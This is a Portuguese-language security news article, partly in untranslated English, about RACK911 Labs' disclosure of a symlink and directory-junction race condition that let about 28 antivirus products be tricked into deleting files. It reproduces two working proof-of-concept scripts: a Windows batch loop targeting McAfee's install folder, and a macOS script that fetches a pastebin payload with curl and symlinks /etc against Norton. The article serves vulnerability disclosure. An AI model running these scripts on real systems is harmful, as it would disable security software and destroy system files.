Investigadores descobriram uma falha simples que existia em quase 28 softwares antivírus.
Essa falha permitia que os autores de malware explorassem o sistema de forma a desligarem por completo o antivírus de um computador e depois os transformassem em ferramentas totalmente destrutivas.
A falha era explorada através de junções de diretório (Windows) e symlinks (macOS & Linux) .
Uma junção de diretório é exclusiva do Windows e só pode vincular dois diretórios; Ela não pode vincular ficheiros, e os diretórios devem ser locais para o sistema de ficheiros do Windows.
Não existe necessidade de elevação de privilégios para explorar esta falha .
Por outro lado, um link simbólico (symlink) é frequentemente usado noLinux e no macOS. Em detalhe, um link simbólico é um tipo de ficheiro que aponta para outro ficheiro.
Using both methods, the flaw leverages the privileged file operations to disable the antivirus software or interfere with the operating system to render it useless, etc.
Basicamente, o Antivirus é executado nos computadores com acesso privilegiado e por isso obtém nível de acesso elevado para verificar todos os ficheiros e diretórios de forma a identificar ficheiros potencialmente maliciosos e desconhecidos, além de colocar em quarentena os casos suspeitos.
Due to this nature of the Antivirus, it opens to a wide range of vulnerabilities and various race conditions. eventually, it allows attackers to gain the high-level privilege of vulnerable systems.
Explorar estes softwares AV é um trabalho particularmente simples e a experiência dos autores de malware pode ser decisiva na exploração da vulnerabilidade. No entanto, a exploração da falha é sensível ao mesmo tempo, e é por isso importante descobrir quando executar a junção de diretório ou o link simbólico.
Em detalhe, Um atacante local que tente escalar privilégios poderá descobrir o momento correto para explorar a falha.
According to the rack911labs report, “In some of the antivirus software that we exploited, the timing wasn’t important at all and a simple loop statement of running the exploit over and over was all that was needed to manipulate the antivirus software into self-destructing. One second too early or one second too late and the exploit will not work.”
Na prova de conceito abaixo, os investigadores exploraram o McAfee Endpoint Security para Windows e conseguiram remover o ficheiro EpSecApiLib.dll do SO.
“In our testing, we were able to delete any file that was not currently in use including the ability to interfere with the antivirus operations itself”, researchers said.
Exploit Code:
:loop rd /s /q C:\Users\User\Desktop\exploit mkdir C:\Users\User\Desktop\exploit echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:\Users\User\Desktop\exploit\EpSecApiLib.dll rd /s /q C:\Users\User\Desktop\exploit mklink /J C:\Users\User\Desktop\exploit “C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform” goto loop
Um outro PoC contra o AV Norton Internet Security no macOS foi também explorado com sucesso fazendo bypass a proteção real time do AV.
Researchers said ” we were able to identify an approximate delay of 6-8 seconds that allows a race condition to occur that can result in a symlink attack causing any file to be removed due to the fact that the software runs as root.”
Exploit code:
#!/bin/sh rm -rf /Users/Username/exploit ; mkdir /Users/Username/exploit curl -k https://pastebin.com/raw/jZJ6Ekzt > /Users/Username/exploit/passwd sleep 6 rm -rf /Users/Username/exploit ; ln -s /etc /Users/Username/exploit
Todas as falhas foram confirmadas pelos provedores, e estão atualmente corrigidas.
Aos utilizadores sugere-se a instalação dos patches de segurança.